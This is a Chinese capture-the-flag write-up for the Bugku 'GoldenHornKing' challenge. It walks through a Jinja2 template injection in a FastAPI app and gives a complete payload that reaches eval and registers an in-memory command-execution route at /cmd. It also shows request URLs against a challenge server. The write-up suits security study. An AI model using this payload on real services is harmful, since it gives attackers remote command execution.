【Bugku】GoldenHornKingWEB

python 复制代码
import os

import jinja2
import functools
import uvicorn
from fastapi import FastAPI
from fastapi.templating import Jinja2Templates
from anyio import fail_after, sleep

# jinja2==3.1.2
# uvicorn==0.30.5
# fastapi==0.112.0

def timeout_after(timeout: int = 1):
    def decorator(func):
        @functools.wraps(func)
        async def wrapper(*args, **kwargs):
            with fail_after(timeout):
                return await func(*args, **kwargs)
        return wrapper

    return decorator

app = FastAPI()
access = False

_base_path = os.path.dirname(os.path.abspath(__file__))
t = Jinja2Templates(directory=_base_path)

@app.get("/")
@timeout_after(1)
async def index():
    return open(__file__, 'r').read()

@app.get("/calc")
@timeout_after(1)
async def ssti(calc_req: str ):
    global access
    # 将数字、百分号、非英文字母过滤并且只能access不能为true(即只能访问一次)
    if (any(char.isdigit() for char in calc_req)) or ("%" in calc_req) or not calc_req.isascii() or access:
        return "bad char"
    else:
        # {{{{ 就是{{ 进行转义
        # 将数字、百分号、非英文字母进行过滤,并且只能access不能为true(即只能访问一次)
        jinja2.Environment(loader=jinja2.BaseLoader()).from_string(f"{{{{ {calc_req} }}}}").render({"app": app})
        access = True
    return "fight"

if __name__ == "__main__":
    uvicorn.run(app, host="0.0.0.0", port=8000)

最关键的代码就是

python 复制代码
@app.get("/calc")
@timeout_after(1)
async def ssti(calc_req: str ):
    global access
    if (any(char.isdigit() for char in calc_req)) or ("%" in calc_req) or not calc_req.isascii() or access:
        return "bad char"
    else:
        jinja2.Environment(loader=jinja2.BaseLoader()).from_string(f"{{{{ {calc_req} }}}}").render({"app": app})
        access = True
    return "fight"

这段代码将数字、百分号、非英文字母进行过滤,并且只能access不能为true(即只能访问一次)

python 复制代码
if (any(char.isdigit() for char in calc_req)) or ("%" in calc_req) or not calc_req.isascii() or access:
        return "bad char"

出现下面这段内容就说明有SSTI漏洞

python 复制代码
.from_string( 用户可控的内容 )

而且在最后返回了一个app对象,可以通过这个app对象进行攻击利用

python 复制代码
.render({"app": app})

有了app我们可以利用SSTI更加方便,可以使用app.class、app.__globals__等

如果没有app我仍然可以使用jinjia2自带的对象request、cycler

传 app = 给黑客送一把金钥匙

不传 app = 黑客自己撬锁,麻烦一点,但还是能进去

使用add_api_route添加内存马

可以通过add_api_route来动态的添加路由,以及对应的endpoint(实际处理请求的函数)

下面这个就是python内存马

python 复制代码
add_api_route(path='/cmd',endpoint=lambda cmd :__import__('os').popen(cmd).read())

然后还要拿到当前的main函数,main是模块里面的,先获取moudles,moudles从sys获取,所以可以通过以下结构为当前服务添加python内存马

python 复制代码
__import__('sys').modules['__main__'].app.add_api_route(path='/cmd',endpoint=lambda cmd :__import__('os').popen(cmd).read())

要执行代码,还要获取eval函数或者exec函数,也就是获取到__globals__'__builtins__''eval',获取__globals__的方法很多,这里使用源码中引入的sleep

以下就是完整的payload

python 复制代码
sleep.__init__.__globals__["__builtins__"]["eval"]("__import__('sys').modules['__main__'].app.add_api_route(path='/cmd',endpoint=lambda cmd :__import__('os').popen(cmd).read())")

访问下面的地址,通过eval函数给当前的main函数添加内存马

http://49.232.142.230:16800/calc?calc_req=sleep.__init__.__globals__\["__builtins__"\]\["eval"\]("__import__('sys').modules\['__main__'\].app.add_api_route(path='/cmd',endpoint=lambda cmd :import('os').popen(cmd).read())")

然后访问下就可以执行命令

http://49.232.142.230:16800/cmd?cmd=cat /flag

相关推荐
小小小小钰儿21 小时前
网络安全名词术语!
安全·web安全·计算机·网络安全·黑客·编程
数据知道1 天前
BGP 劫持是怎么回事?运营商级路由安全科普
网络·安全·网络安全·智能路由器·bgp劫持
m0_738120721 天前
AI安全实战系列(四):Lab04 Multi-Agent——多智能体攻击分析
服务器·开发语言·人工智能·安全·网络安全·语言模型
Hiyajo pray2 天前
SDN 访问控制性能调优方法
服务器·网络·网络安全
数据知道2 天前
网络安全职业规划:从入门到高级安全工程师的路径图
安全·web安全·网络安全·渗透测试·职业规划
Sagittarius_A*2 天前
Web 渗透实战:服务器系统识别、端口与中间件全量探测
服务器·网络安全·中间件·渗透测试
学逆向的2 天前
汇编——函数
开发语言·汇编·网络安全
HackTwoHub2 天前
AntiDebug Mcp、AI逆向绕过前端,Hook 加密接口,抓取 Vue 路由漏洞,接入 MCP 让 AI 自动化挖掘前端漏洞
前端·vue.js·人工智能·安全·web安全·网络安全·系统安全
JS_SWKJ2 天前
【无标题】
网络安全
学逆向的2 天前
汇编——修改EIP的值
开发语言·汇编·网络安全